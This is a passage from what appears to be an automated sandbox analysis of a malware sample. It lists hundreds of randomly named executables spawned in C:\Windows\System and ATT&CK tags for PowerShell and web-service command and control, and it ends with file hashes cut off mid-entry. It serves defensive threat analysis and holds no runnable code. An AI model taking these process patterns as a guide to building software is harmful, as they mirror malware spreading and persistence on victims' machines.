  2⤵
  PID:8316
- C:\Windows\System\RbGyWhs.exe
  C:\Windows\System\RbGyWhs.exe
  2⤵
  PID:8352
- C:\Windows\System\WNPyNRg.exe
  C:\Windows\System\WNPyNRg.exe
  2⤵
  PID:8412
- C:\Windows\System\PMBUcsm.exe
  C:\Windows\System\PMBUcsm.exe
  2⤵
  PID:8464
- C:\Windows\System\oWZmhQs.exe
  C:\Windows\System\oWZmhQs.exe
  2⤵
  PID:8512
- C:\Windows\System\opunKCM.exe
  C:\Windows\System\opunKCM.exe
  2⤵
  PID:8604
- C:\Windows\System\HLIrOPQ.exe
  C:\Windows\System\HLIrOPQ.exe
  2⤵
  PID:8632
- C:\Windows\System\lBtpXRr.exe
  C:\Windows\System\lBtpXRr.exe
  2⤵
  PID:8708
- C:\Windows\System\dkCIDKe.exe
  C:\Windows\System\dkCIDKe.exe
  2⤵
  PID:8748
- C:\Windows\System\vUeSFde.exe
  C:\Windows\System\vUeSFde.exe
  2⤵
  PID:8800
- C:\Windows\System\AqZPace.exe
  C:\Windows\System\AqZPace.exe
  2⤵
  PID:8876
- C:\Windows\System\mMlBYbH.exe
  C:\Windows\System\mMlBYbH.exe
  2⤵
  PID:8940
- C:\Windows\System\YFKPnHo.exe
  C:\Windows\System\YFKPnHo.exe
  2⤵
  PID:8992
- C:\Windows\System\YcAqKFR.exe
  C:\Windows\System\YcAqKFR.exe
  2⤵
  PID:9020
- C:\Windows\System\hDGEVHp.exe
  C:\Windows\System\hDGEVHp.exe
  2⤵
  PID:9068
- C:\Windows\System\uEAMeQT.exe
  C:\Windows\System\uEAMeQT.exe
  2⤵
  PID:9100
- C:\Windows\System\pWWiLqL.exe
  C:\Windows\System\pWWiLqL.exe
  2⤵
  PID:9164
- C:\Windows\System\OACLgum.exe
  C:\Windows\System\OACLgum.exe
  2⤵
  PID:9208
- C:\Windows\System\aHXsfhx.exe
  C:\Windows\System\aHXsfhx.exe
  2⤵
  PID:8256
- C:\Windows\System\pKOUmIY.exe
  C:\Windows\System\pKOUmIY.exe
  2⤵
  PID:8340
- C:\Windows\System\AnoRWLA.exe
  C:\Windows\System\AnoRWLA.exe
  2⤵
  PID:8396
- C:\Windows\System\rVhvxUq.exe
  C:\Windows\System\rVhvxUq.exe
  2⤵
  PID:8444
- C:\Windows\System\GPVoSPT.exe
  C:\Windows\System\GPVoSPT.exe
  2⤵
  PID:8460
- C:\Windows\System\omUJbXg.exe
  C:\Windows\System\omUJbXg.exe
  2⤵
  PID:8576
- C:\Windows\System\jkAktAl.exe
  C:\Windows\System\jkAktAl.exe
  2⤵
  PID:8724
- C:\Windows\System\msjsdlG.exe
  C:\Windows\System\msjsdlG.exe
  2⤵
  PID:8732
- C:\Windows\System\SvLLNIU.exe
  C:\Windows\System\SvLLNIU.exe
  2⤵
  PID:8792
- C:\Windows\System\vYADKDi.exe
  C:\Windows\System\vYADKDi.exe
  2⤵
  PID:8828
- C:\Windows\System\qHPdTVI.exe
  C:\Windows\System\qHPdTVI.exe
  2⤵
  PID:8976
- C:\Windows\System\eroNZlY.exe
  C:\Windows\System\eroNZlY.exe
  2⤵
  PID:9056
- C:\Windows\System\SOJeFMo.exe
  C:\Windows\System\SOJeFMo.exe
  2⤵
  PID:9128
- C:\Windows\System\VIcyrca.exe
  C:\Windows\System\VIcyrca.exe
  2⤵
  PID:1028
- C:\Windows\System\wOWSEyd.exe
  C:\Windows\System\wOWSEyd.exe
  2⤵
  PID:8252
- C:\Windows\System\byEmupP.exe
  C:\Windows\System\byEmupP.exe
  2⤵
  PID:8264
- C:\Windows\System\rYqSKuf.exe
  C:\Windows\System\rYqSKuf.exe
  2⤵
  PID:8384
- C:\Windows\System\xvEJmCN.exe
  C:\Windows\System\xvEJmCN.exe
  2⤵
  PID:8432
- C:\Windows\System\ZQaCcWf.exe
  C:\Windows\System\ZQaCcWf.exe
  2⤵
  PID:8520
- C:\Windows\System\vumWPuQ.exe
  C:\Windows\System\vumWPuQ.exe
  2⤵
  PID:8544
- C:\Windows\System\dtzlNtD.exe
  C:\Windows\System\dtzlNtD.exe
  2⤵
  PID:8564
- C:\Windows\System\JwSriaP.exe
  C:\Windows\System\JwSriaP.exe
  2⤵
  PID:8784
- C:\Windows\System\RgbeNVo.exe
  C:\Windows\System\RgbeNVo.exe
  2⤵
  PID:8812
- C:\Windows\System\uNjQYlr.exe
  C:\Windows\System\uNjQYlr.exe
  2⤵
  PID:8888
- C:\Windows\System\kGRhigo.exe
  C:\Windows\System\kGRhigo.exe
  2⤵
  PID:8832
- C:\Windows\System\xobbWyd.exe
  C:\Windows\System\xobbWyd.exe
  2⤵
  PID:8932
- C:\Windows\System\lIvPMmO.exe
  C:\Windows\System\lIvPMmO.exe
  2⤵
  PID:8988
- C:\Windows\System\BzAYkhh.exe
  C:\Windows\System\BzAYkhh.exe
  2⤵
  PID:9132
- C:\Windows\System\rZEyunC.exe
  C:\Windows\System\rZEyunC.exe
  2⤵
  PID:9176
- C:\Windows\System\bxtEFiB.exe
  C:\Windows\System\bxtEFiB.exe
  2⤵
  PID:8304
- C:\Windows\System\zrrtbPl.exe
  C:\Windows\System\zrrtbPl.exe
  2⤵
  PID:8348
- C:\Windows\System\WRhYNuj.exe
  C:\Windows\System\WRhYNuj.exe
  2⤵
  PID:8524
- C:\Windows\System\tWIKZxH.exe
  C:\Windows\System\tWIKZxH.exe
  2⤵
  PID:8720
- C:\Windows\System\lztMQBj.exe
  C:\Windows\System\lztMQBj.exe
  2⤵
  PID:8856
- C:\Windows\System\sUfDkLW.exe
  C:\Windows\System\sUfDkLW.exe
  2⤵
  PID:2180
- C:\Windows\System\DMQJShe.exe
  C:\Windows\System\DMQJShe.exe
  2⤵
  PID:9092
- C:\Windows\System\lptfqxU.exe
  C:\Windows\System\lptfqxU.exe
  2⤵
  PID:9108
- C:\Windows\System\fiADpPj.exe
  C:\Windows\System\fiADpPj.exe
  2⤵
  PID:4724
- C:\Windows\System\ZtXscZS.exe
  C:\Windows\System\ZtXscZS.exe
  2⤵
  PID:8248
- C:\Windows\System\uEAoDWI.exe
  C:\Windows\System\uEAoDWI.exe
  2⤵
  PID:8476
- C:\Windows\System\qYpqsWg.exe
  C:\Windows\System\qYpqsWg.exe
  2⤵
  PID:8908
- C:\Windows\System\uVbezKC.exe
  C:\Windows\System\uVbezKC.exe
  2⤵
  PID:8984
- C:\Windows\System\nBvuIUr.exe
  C:\Windows\System\nBvuIUr.exe
  2⤵
  PID:8156
- C:\Windows\System\NracgxE.exe
  C:\Windows\System\NracgxE.exe
  2⤵
  PID:8696
- C:\Windows\System\uwxDYbs.exe
  C:\Windows\System\uwxDYbs.exe
  2⤵
  PID:8172
- C:\Windows\System\hrbXOTS.exe
  C:\Windows\System\hrbXOTS.exe
  2⤵
  PID:8620
- C:\Windows\System\zlxzYrO.exe
  C:\Windows\System\zlxzYrO.exe
  2⤵
  PID:3896
- C:\Windows\System\bXFNdXb.exe
  C:\Windows\System\bXFNdXb.exe
  2⤵
  PID:9260
- C:\Windows\System\YZGVirO.exe
  C:\Windows\System\YZGVirO.exe
  2⤵
  PID:9292
- C:\Windows\System\KFEWIrz.exe
  C:\Windows\System\KFEWIrz.exe
  2⤵
  PID:9324
- C:\Windows\System\nTytnus.exe
  C:\Windows\System\nTytnus.exe
  2⤵
  PID:9360
- C:\Windows\System\FwXBRxE.exe
  C:\Windows\System\FwXBRxE.exe
  2⤵
  PID:9392
- C:\Windows\System\vmSSHoc.exe
  C:\Windows\System\vmSSHoc.exe
  2⤵
  PID:9412
- C:\Windows\System\iQKTBVo.exe
  C:\Windows\System\iQKTBVo.exe
  2⤵
  PID:9444
- C:\Windows\System\fZNNLkI.exe
  C:\Windows\System\fZNNLkI.exe
  2⤵
  PID:9492
- C:\Windows\System\gElaSVK.exe
  C:\Windows\System\gElaSVK.exe
  2⤵
  PID:9532
- C:\Windows\System\gplURvX.exe
  C:\Windows\System\gplURvX.exe
  2⤵
  PID:9584
- C:\Windows\System\XIuOlAe.exe
  C:\Windows\System\XIuOlAe.exe
  2⤵
  PID:9608
- C:\Windows\System\lMCInds.exe
  C:\Windows\System\lMCInds.exe
  2⤵
  PID:9628
- C:\Windows\System\mRRNoRF.exe
  C:\Windows\System\mRRNoRF.exe
  2⤵
  PID:9676
- C:\Windows\System\mxCrXWa.exe
  C:\Windows\System\mxCrXWa.exe
  2⤵
  PID:9752
- C:\Windows\System\ruzRVpv.exe
  C:\Windows\System\ruzRVpv.exe
  2⤵
  PID:9788
- C:\Windows\System\asfkBYJ.exe
  C:\Windows\System\asfkBYJ.exe
  2⤵
  PID:9804
- C:\Windows\System\OSoWPLb.exe
  C:\Windows\System\OSoWPLb.exe
  2⤵
  PID:9820
- C:\Windows\System\AmFUTWM.exe
  C:\Windows\System\AmFUTWM.exe
  2⤵
  PID:9848
- C:\Windows\System\DrLiuQU.exe
  C:\Windows\System\DrLiuQU.exe
  2⤵
  PID:9900
- C:\Windows\System\TNzCLHR.exe
  C:\Windows\System\TNzCLHR.exe
  2⤵
  PID:9928
- C:\Windows\System\oOAouyq.exe
  C:\Windows\System\oOAouyq.exe
  2⤵
  PID:9952
- C:\Windows\System\PNrXDzm.exe
  C:\Windows\System\PNrXDzm.exe
  2⤵
  PID:9984
- C:\Windows\System\DFboLvM.exe
  C:\Windows\System\DFboLvM.exe
  2⤵
  PID:10012
- C:\Windows\System\BItOgFX.exe
  C:\Windows\System\BItOgFX.exe
  2⤵
  PID:10040
- C:\Windows\System\eYiBPle.exe
  C:\Windows\System\eYiBPle.exe
  2⤵
  PID:10068
- C:\Windows\System\zmrAErf.exe
  C:\Windows\System\zmrAErf.exe
  2⤵
  PID:10100
- C:\Windows\System\eAgOjIn.exe
  C:\Windows\System\eAgOjIn.exe
  2⤵
  PID:10128
- C:\Windows\System\yRETtrd.exe
  C:\Windows\System\yRETtrd.exe
  2⤵
  PID:10160
- C:\Windows\System\UMcxOpJ.exe
  C:\Windows\System\UMcxOpJ.exe
  2⤵
  PID:10176
- C:\Windows\System\mEfKtrU.exe
  C:\Windows\System\mEfKtrU.exe
  2⤵
  PID:10216
- C:\Windows\System\JAMbRos.exe
  C:\Windows\System\JAMbRos.exe
  2⤵
  PID:10232
- C:\Windows\System\BuhHdrW.exe
  C:\Windows\System\BuhHdrW.exe
  2⤵
  PID:9276
- C:\Windows\System\PpMXYDZ.exe
  C:\Windows\System\PpMXYDZ.exe
  2⤵
  PID:9320
- C:\Windows\System\vkUEzJd.exe
  C:\Windows\System\vkUEzJd.exe
  2⤵
  PID:9380
- C:\Windows\System\fgrTNOC.exe
  C:\Windows\System\fgrTNOC.exe
  2⤵
  PID:784
- C:\Windows\System\aMdDxVP.exe
  C:\Windows\System\aMdDxVP.exe
  2⤵
  PID:9480
- C:\Windows\System\lLJJfxu.exe
  C:\Windows\System\lLJJfxu.exe
  2⤵
  PID:9516
- C:\Windows\System\aETGxyr.exe
  C:\Windows\System\aETGxyr.exe
  2⤵
  PID:9564
- C:\Windows\System\GBwFpBl.exe
  C:\Windows\System\GBwFpBl.exe
  2⤵
  PID:9604
- C:\Windows\System\edVSQIy.exe
  C:\Windows\System\edVSQIy.exe
  2⤵
  PID:9620
- C:\Windows\System\TpyEVgU.exe
  C:\Windows\System\TpyEVgU.exe
  2⤵
  PID:9736
- C:\Windows\System\IzHTqJf.exe
  C:\Windows\System\IzHTqJf.exe
  2⤵
  PID:9780
- C:\Windows\System\qKphYyK.exe
  C:\Windows\System\qKphYyK.exe
  2⤵
  PID:9816
- C:\Windows\System\xQjQwSE.exe
  C:\Windows\System\xQjQwSE.exe
  2⤵
  PID:9924
- C:\Windows\System\CNMyuXm.exe
  C:\Windows\System\CNMyuXm.exe
  2⤵
  PID:9996
- C:\Windows\System\XwxsdQs.exe
  C:\Windows\System\XwxsdQs.exe
  2⤵
  PID:10060
- C:\Windows\System\OmqXlbo.exe
  C:\Windows\System\OmqXlbo.exe
  2⤵
  PID:10120
- C:\Windows\System\FsVLbAd.exe
  C:\Windows\System\FsVLbAd.exe
  2⤵
  PID:10212
- C:\Windows\System\UKllbsv.exe
  C:\Windows\System\UKllbsv.exe
  2⤵
  PID:10228
- C:\Windows\System\NWVwAgz.exe
  C:\Windows\System\NWVwAgz.exe
  2⤵
  PID:9408
- C:\Windows\System\ycUgEfP.exe
  C:\Windows\System\ycUgEfP.exe
  2⤵
  PID:3872
- C:\Windows\System\IJsafji.exe
  C:\Windows\System\IJsafji.exe
  2⤵
  PID:9580
- C:\Windows\System\YHwYcaz.exe
  C:\Windows\System\YHwYcaz.exe
  2⤵
  PID:9704
- C:\Windows\System\UKpEqlq.exe
  C:\Windows\System\UKpEqlq.exe
  2⤵
  PID:9872
- C:\Windows\System\OjKGBiQ.exe
  C:\Windows\System\OjKGBiQ.exe
  2⤵
  PID:10024
- C:\Windows\System\BxAAqIR.exe
  C:\Windows\System\BxAAqIR.exe
  2⤵
  PID:10172
- C:\Windows\System\eUfYxJZ.exe
  C:\Windows\System\eUfYxJZ.exe
  2⤵
  PID:9348
- C:\Windows\System\zNGtklI.exe
  C:\Windows\System\zNGtklI.exe
  2⤵
  PID:9644
- C:\Windows\System\JfYSxPV.exe
  C:\Windows\System\JfYSxPV.exe
  2⤵
  PID:9976
- C:\Windows\System\LUBoddJ.exe
  C:\Windows\System\LUBoddJ.exe
  2⤵
  PID:9340
- C:\Windows\System\VAZTsGZ.exe
  C:\Windows\System\VAZTsGZ.exe
  2⤵
  PID:9720
- C:\Windows\System\NffvMEd.exe
  C:\Windows\System\NffvMEd.exe
  2⤵
  PID:10256
- C:\Windows\System\SHAOjvD.exe
  C:\Windows\System\SHAOjvD.exe
  2⤵
  PID:10284
- C:\Windows\System\oglZKLS.exe
  C:\Windows\System\oglZKLS.exe
  2⤵
  PID:10312
- C:\Windows\System\JVPMtiM.exe
  C:\Windows\System\JVPMtiM.exe
  2⤵
  PID:10340
- C:\Windows\System\CSYGmXw.exe
  C:\Windows\System\CSYGmXw.exe
  2⤵
  PID:10368
- C:\Windows\System\PNybYgs.exe
  C:\Windows\System\PNybYgs.exe
  2⤵
  PID:10388
- C:\Windows\System\NufEDNT.exe
  C:\Windows\System\NufEDNT.exe
  2⤵
  PID:10424
- C:\Windows\System\EDXwyCU.exe
  C:\Windows\System\EDXwyCU.exe
  2⤵
  PID:10452
- C:\Windows\System\Jbslyyf.exe
  C:\Windows\System\Jbslyyf.exe
  2⤵
  PID:10484
- C:\Windows\System\WfgxESy.exe
  C:\Windows\System\WfgxESy.exe
  2⤵
  PID:10500
- C:\Windows\System\qmyceVm.exe
  C:\Windows\System\qmyceVm.exe
  2⤵
  PID:10540
- C:\Windows\System\QqjiEGE.exe
  C:\Windows\System\QqjiEGE.exe
  2⤵
  PID:10568
- C:\Windows\System\dwzamQo.exe
  C:\Windows\System\dwzamQo.exe
  2⤵
  PID:10596
- C:\Windows\System\BxUVJfF.exe
  C:\Windows\System\BxUVJfF.exe
  2⤵
  PID:10624
- C:\Windows\System\NFHZsgz.exe
  C:\Windows\System\NFHZsgz.exe
  2⤵
  PID:10652
- C:\Windows\System\VqkGZzi.exe
  C:\Windows\System\VqkGZzi.exe
  2⤵
  PID:10680
- C:\Windows\System\uqHSLFl.exe
  C:\Windows\System\uqHSLFl.exe
  2⤵
  PID:10708
- C:\Windows\System\oOquMuQ.exe
  C:\Windows\System\oOquMuQ.exe
  2⤵
  PID:10736
- C:\Windows\System\USODfEO.exe
  C:\Windows\System\USODfEO.exe
  2⤵
  PID:10764
- C:\Windows\System\FmzZgRn.exe
  C:\Windows\System\FmzZgRn.exe
  2⤵
  PID:10792
- C:\Windows\System\nmhyKeT.exe
  C:\Windows\System\nmhyKeT.exe
  2⤵
  PID:10820
- C:\Windows\System\ytRwuug.exe
  C:\Windows\System\ytRwuug.exe
  2⤵
  PID:10848
- C:\Windows\System\QlSWQXY.exe
  C:\Windows\System\QlSWQXY.exe
  2⤵
  PID:10876
- C:\Windows\System\tXyDZCG.exe
  C:\Windows\System\tXyDZCG.exe
  2⤵
  PID:10904
- C:\Windows\System\QiJiKEn.exe
  C:\Windows\System\QiJiKEn.exe
  2⤵
  PID:10932
- C:\Windows\System\CLuHzIO.exe
  C:\Windows\System\CLuHzIO.exe
  2⤵
  PID:10960
- C:\Windows\System\FMEliKy.exe
  C:\Windows\System\FMEliKy.exe
  2⤵
  PID:10988
- C:\Windows\System\pRmWCiw.exe
  C:\Windows\System\pRmWCiw.exe
  2⤵
  PID:11016
- C:\Windows\System\FRtUVAN.exe
  C:\Windows\System\FRtUVAN.exe
  2⤵
  PID:11044
- C:\Windows\System\FpmKeIo.exe
  C:\Windows\System\FpmKeIo.exe
  2⤵
  PID:11072
- C:\Windows\System\xGdNDKX.exe
  C:\Windows\System\xGdNDKX.exe
  2⤵
  PID:11088
- C:\Windows\System\rhNiaHf.exe
  C:\Windows\System\rhNiaHf.exe
  2⤵
  PID:11128
- C:\Windows\System\VMRGeOy.exe
  C:\Windows\System\VMRGeOy.exe
  2⤵
  PID:11156
- C:\Windows\System\TXLHJIo.exe
  C:\Windows\System\TXLHJIo.exe
  2⤵
  PID:11184
- C:\Windows\System\yPOtoqE.exe
  C:\Windows\System\yPOtoqE.exe
  2⤵
  PID:11212
- C:\Windows\System\OiFjKCF.exe
  C:\Windows\System\OiFjKCF.exe
  2⤵
  PID:11228
- C:\Windows\System\VFxovnY.exe
  C:\Windows\System\VFxovnY.exe
  2⤵
  PID:9228
- C:\Windows\System\WdAaYEL.exe
  C:\Windows\System\WdAaYEL.exe
  2⤵
  PID:10276
- C:\Windows\System\xDQHbgU.exe
  C:\Windows\System\xDQHbgU.exe
  2⤵
  PID:10352
- C:\Windows\System\UQiuamo.exe
  C:\Windows\System\UQiuamo.exe
  2⤵
  PID:10416
- C:\Windows\System\Cpzrqkd.exe
  C:\Windows\System\Cpzrqkd.exe
  2⤵
  PID:10480
- C:\Windows\System\BBBThgw.exe
  C:\Windows\System\BBBThgw.exe
  2⤵
  PID:10524
- C:\Windows\System\zuhzfmc.exe
  C:\Windows\System\zuhzfmc.exe
  2⤵
  PID:10592
- C:\Windows\System\WxcLzzX.exe
  C:\Windows\System\WxcLzzX.exe
  2⤵
  PID:10644
- C:\Windows\System\hAiNlWh.exe
  C:\Windows\System\hAiNlWh.exe
  2⤵
  PID:10704
- C:\Windows\System\dlAsWFf.exe
  C:\Windows\System\dlAsWFf.exe
  2⤵
  PID:10776
- C:\Windows\System\BaMpirU.exe
  C:\Windows\System\BaMpirU.exe
  2⤵
  PID:10832
- C:\Windows\System\LPaGmTi.exe
  C:\Windows\System\LPaGmTi.exe
  2⤵
  PID:10900
- C:\Windows\System\HuKvBdw.exe
  C:\Windows\System\HuKvBdw.exe
  2⤵
  PID:10972
- C:\Windows\System\JKQBToI.exe
  C:\Windows\System\JKQBToI.exe
  2⤵
  PID:11000
- C:\Windows\System\cJKfiId.exe
  C:\Windows\System\cJKfiId.exe
  2⤵
  PID:11068
- C:\Windows\System\ZayameW.exe
  C:\Windows\System\ZayameW.exe
  2⤵
  PID:11148
- C:\Windows\System\LqssLBG.exe
  C:\Windows\System\LqssLBG.exe
  2⤵
  PID:11196
- C:\Windows\System\vbKSYDA.exe
  C:\Windows\System\vbKSYDA.exe
  2⤵
  PID:11244
- C:\Windows\System\nhdgTvQ.exe
  C:\Windows\System\nhdgTvQ.exe
  2⤵
  PID:10332
- C:\Windows\System\LamsJqB.exe
  C:\Windows\System\LamsJqB.exe
  2⤵
  PID:3152
- C:\Windows\System\yNuJQOT.exe
  C:\Windows\System\yNuJQOT.exe
  2⤵
  PID:10696
- C:\Windows\System\QSpcaFG.exe
  C:\Windows\System\QSpcaFG.exe
  2⤵
  PID:10812
- C:\Windows\System\jxuCrCA.exe
  C:\Windows\System\jxuCrCA.exe
  2⤵
  PID:11004
- C:\Windows\System\Unuphcj.exe
  C:\Windows\System\Unuphcj.exe
  2⤵
  PID:11168
- C:\Windows\System\KuRVnyl.exe
  C:\Windows\System\KuRVnyl.exe
  2⤵
  PID:10096
- C:\Windows\System\dSXrOyI.exe
  C:\Windows\System\dSXrOyI.exe
  2⤵
  PID:10612
- C:\Windows\System\RLaekOc.exe
  C:\Windows\System\RLaekOc.exe
  2⤵
  PID:10672
- C:\Windows\System\TBCvkaL.exe
  C:\Windows\System\TBCvkaL.exe
  2⤵
  PID:10472
- C:\Windows\System\QJRayVM.exe
  C:\Windows\System\QJRayVM.exe
  2⤵
  PID:10460
- C:\Windows\System\KpFkNzy.exe
  C:\Windows\System\KpFkNzy.exe
  2⤵
  PID:11220
- C:\Windows\System\SvXUDGq.exe
  C:\Windows\System\SvXUDGq.exe
  2⤵
  PID:11280
- C:\Windows\System\FByiTJn.exe
  C:\Windows\System\FByiTJn.exe
  2⤵
  PID:11308
- C:\Windows\System\HnLBuuz.exe
  C:\Windows\System\HnLBuuz.exe
  2⤵
  PID:11336
- C:\Windows\System\MfDJiQe.exe
  C:\Windows\System\MfDJiQe.exe
  2⤵
  PID:11364
- C:\Windows\System\edoKrZD.exe
  C:\Windows\System\edoKrZD.exe
  2⤵
  PID:11392
- C:\Windows\System\buZZneQ.exe
  C:\Windows\System\buZZneQ.exe
  2⤵
  PID:11420
- C:\Windows\System\nUesiEk.exe
  C:\Windows\System\nUesiEk.exe
  2⤵
  PID:11448
- C:\Windows\System\REFmozb.exe
  C:\Windows\System\REFmozb.exe
  2⤵
  PID:11476
- C:\Windows\System\mLdgcAQ.exe
  C:\Windows\System\mLdgcAQ.exe
  2⤵
  PID:11496
- C:\Windows\System\DSFpzXp.exe
  C:\Windows\System\DSFpzXp.exe
  2⤵
  PID:11520
- C:\Windows\System\DbINXHU.exe
  C:\Windows\System\DbINXHU.exe
  2⤵
  PID:11548
- C:\Windows\System\EutycxQ.exe
  C:\Windows\System\EutycxQ.exe
  2⤵
  PID:11564
- C:\Windows\System\FcPGakE.exe
  C:\Windows\System\FcPGakE.exe
  2⤵
  PID:11616
- C:\Windows\System\htWRltf.exe
  C:\Windows\System\htWRltf.exe
  2⤵
  PID:11644
- C:\Windows\System\uBskXgS.exe
  C:\Windows\System\uBskXgS.exe
  2⤵
  PID:11672
- C:\Windows\System\cZaSYnI.exe
  C:\Windows\System\cZaSYnI.exe
  2⤵
  PID:11688
- C:\Windows\System\oicQcTE.exe
  C:\Windows\System\oicQcTE.exe
  2⤵
  PID:11728
- C:\Windows\System\MGWDdrd.exe
  C:\Windows\System\MGWDdrd.exe
  2⤵
  PID:11756
- C:\Windows\System\cKnhshD.exe
  C:\Windows\System\cKnhshD.exe
  2⤵
  PID:11776
- C:\Windows\System\yUmRFYZ.exe
  C:\Windows\System\yUmRFYZ.exe
  2⤵
  PID:11812
- C:\Windows\System\FwtjLAV.exe
  C:\Windows\System\FwtjLAV.exe
  2⤵
  PID:11840
- C:\Windows\System\wxVAAdu.exe
  C:\Windows\System\wxVAAdu.exe
  2⤵
  PID:11868
- C:\Windows\System\HRLoONK.exe
  C:\Windows\System\HRLoONK.exe
  2⤵
  PID:11896
- C:\Windows\System\csQVFpS.exe
  C:\Windows\System\csQVFpS.exe
  2⤵
  PID:11924
- C:\Windows\System\VUeibUy.exe
  C:\Windows\System\VUeibUy.exe
  2⤵
  PID:11940
- C:\Windows\System\zOtaGTH.exe
  C:\Windows\System\zOtaGTH.exe
  2⤵
  PID:11968
- C:\Windows\System\NFNdhdk.exe
  C:\Windows\System\NFNdhdk.exe
  2⤵
  PID:12008
- C:\Windows\System\xvSARXp.exe
  C:\Windows\System\xvSARXp.exe
  2⤵
  PID:12036
- C:\Windows\System\PCzSiWA.exe
  C:\Windows\System\PCzSiWA.exe
  2⤵
  PID:12068
- C:\Windows\System\EydBVEB.exe
  C:\Windows\System\EydBVEB.exe
  2⤵
  PID:12084
- C:\Windows\System\HLzJoir.exe
  C:\Windows\System\HLzJoir.exe
  2⤵
  PID:12124
- C:\Windows\System\ZRbvJRe.exe
  C:\Windows\System\ZRbvJRe.exe
  2⤵
  PID:12152
- C:\Windows\System\lIRCzcC.exe
  C:\Windows\System\lIRCzcC.exe
  2⤵
  PID:12180
- C:\Windows\System\leScOOn.exe
  C:\Windows\System\leScOOn.exe
  2⤵
  PID:12208
- C:\Windows\System\zXcemDm.exe
  C:\Windows\System\zXcemDm.exe
  2⤵
  PID:12236
- C:\Windows\System\mHPbOhM.exe
  C:\Windows\System\mHPbOhM.exe
  2⤵
  PID:12264
- C:\Windows\System\wknUngA.exe
  C:\Windows\System\wknUngA.exe
  2⤵
  PID:10896
- C:\Windows\System\cawQBZu.exe
  C:\Windows\System\cawQBZu.exe
  2⤵
  PID:11332
- C:\Windows\System\RdMnEig.exe
  C:\Windows\System\RdMnEig.exe
  2⤵
  PID:11376
- C:\Windows\System\UbDwWnC.exe
  C:\Windows\System\UbDwWnC.exe
  2⤵
  PID:11468
- C:\Windows\System\aUTDFyq.exe
  C:\Windows\System\aUTDFyq.exe
  2⤵
  PID:11484
- C:\Windows\System\tnPmjHN.exe
  C:\Windows\System\tnPmjHN.exe
  2⤵
  PID:11592
- C:\Windows\System\Eykebsw.exe
  C:\Windows\System\Eykebsw.exe
  2⤵
  PID:11664
- C:\Windows\System\RlCumac.exe
  C:\Windows\System\RlCumac.exe
  2⤵
  PID:660
- C:\Windows\System\wDEFUNe.exe
  C:\Windows\System\wDEFUNe.exe
  2⤵
  PID:648
- C:\Windows\System\yZDwONb.exe
  C:\Windows\System\yZDwONb.exe
  2⤵
  PID:11768
- C:\Windows\System\irzFyHi.exe
  C:\Windows\System\irzFyHi.exe
  2⤵
  PID:11836
- C:\Windows\System\ysVfmyH.exe
  C:\Windows\System\ysVfmyH.exe
  2⤵
  PID:11908
- C:\Windows\System\wGMBEyB.exe
  C:\Windows\System\wGMBEyB.exe
  2⤵
  PID:11960
- C:\Windows\System\VBmquUX.exe
  C:\Windows\System\VBmquUX.exe
  2⤵
  PID:12028
- C:\Windows\System\yHZWVpK.exe
  C:\Windows\System\yHZWVpK.exe
  2⤵
  PID:12100
- C:\Windows\System\hxZdSaQ.exe
  C:\Windows\System\hxZdSaQ.exe
  2⤵
  PID:12164
- C:\Windows\System\yfSupMw.exe
  C:\Windows\System\yfSupMw.exe
  2⤵
  PID:12200
- C:\Windows\System\iyaVlIf.exe
  C:\Windows\System\iyaVlIf.exe
  2⤵
  PID:11268
- C:\Windows\System\zQiVGsZ.exe
  C:\Windows\System\zQiVGsZ.exe
  2⤵
  PID:11404
- C:\Windows\System\OAQukVM.exe
  C:\Windows\System\OAQukVM.exe
  2⤵
  PID:11488
- C:\Windows\System\qmPygCv.exe
  C:\Windows\System\qmPygCv.exe
  2⤵
  PID:4044
- C:\Windows\System\iNWlGog.exe
  C:\Windows\System\iNWlGog.exe
  2⤵
  PID:11808
- C:\Windows\System\aVmftBC.exe
  C:\Windows\System\aVmftBC.exe
  2⤵
  PID:11936
- C:\Windows\System\qGsZXQb.exe
  C:\Windows\System\qGsZXQb.exe
  2⤵
  PID:12076
- C:\Windows\System\THPjYcG.exe
  C:\Windows\System\THPjYcG.exe
  2⤵
  PID:12248
- C:\Windows\System\yPMtjsd.exe
  C:\Windows\System\yPMtjsd.exe
  2⤵
  PID:11460
- C:\Windows\System\qCXZULG.exe
  C:\Windows\System\qCXZULG.exe
  2⤵
  PID:3728
- C:\Windows\System\ZOnFAgj.exe
  C:\Windows\System\ZOnFAgj.exe
  2⤵
  PID:12192
- C:\Windows\System\ynHaLHq.exe
  C:\Windows\System\ynHaLHq.exe
  2⤵
  PID:11680
- C:\Windows\System\xkFMJlx.exe
  C:\Windows\System\xkFMJlx.exe
  2⤵
  PID:12056
- C:\Windows\System\IZxpAUF.exe
  C:\Windows\System\IZxpAUF.exe
  2⤵
  PID:12308
- C:\Windows\System\jJRBvqr.exe
  C:\Windows\System\jJRBvqr.exe
  2⤵
  PID:12340
- C:\Windows\System\mJpYFlW.exe
  C:\Windows\System\mJpYFlW.exe
  2⤵
  PID:12356
- C:\Windows\System\UrtgrJc.exe
  C:\Windows\System\UrtgrJc.exe
  2⤵
  PID:12396
- C:\Windows\System\IPtiHfD.exe
  C:\Windows\System\IPtiHfD.exe
  2⤵
  PID:12412
- C:\Windows\System\rbPzeFV.exe
  C:\Windows\System\rbPzeFV.exe
  2⤵
  PID:12452
- C:\Windows\System\HNiediC.exe
  C:\Windows\System\HNiediC.exe
  2⤵
  PID:12468
- C:\Windows\System\heUPXFr.exe
  C:\Windows\System\heUPXFr.exe
  2⤵
  PID:12488
- C:\Windows\System\MneqxcE.exe
  C:\Windows\System\MneqxcE.exe
  2⤵
  PID:12556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uhubucji.b1u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System\AvDNxYZ.exe

Filesize
3.2MB

MD5
f84de65c5e726745b0496ee0ec7bb78a

SHA1
a4efb15e0fa3da7d9351fe8af32007790002f500

SHA256
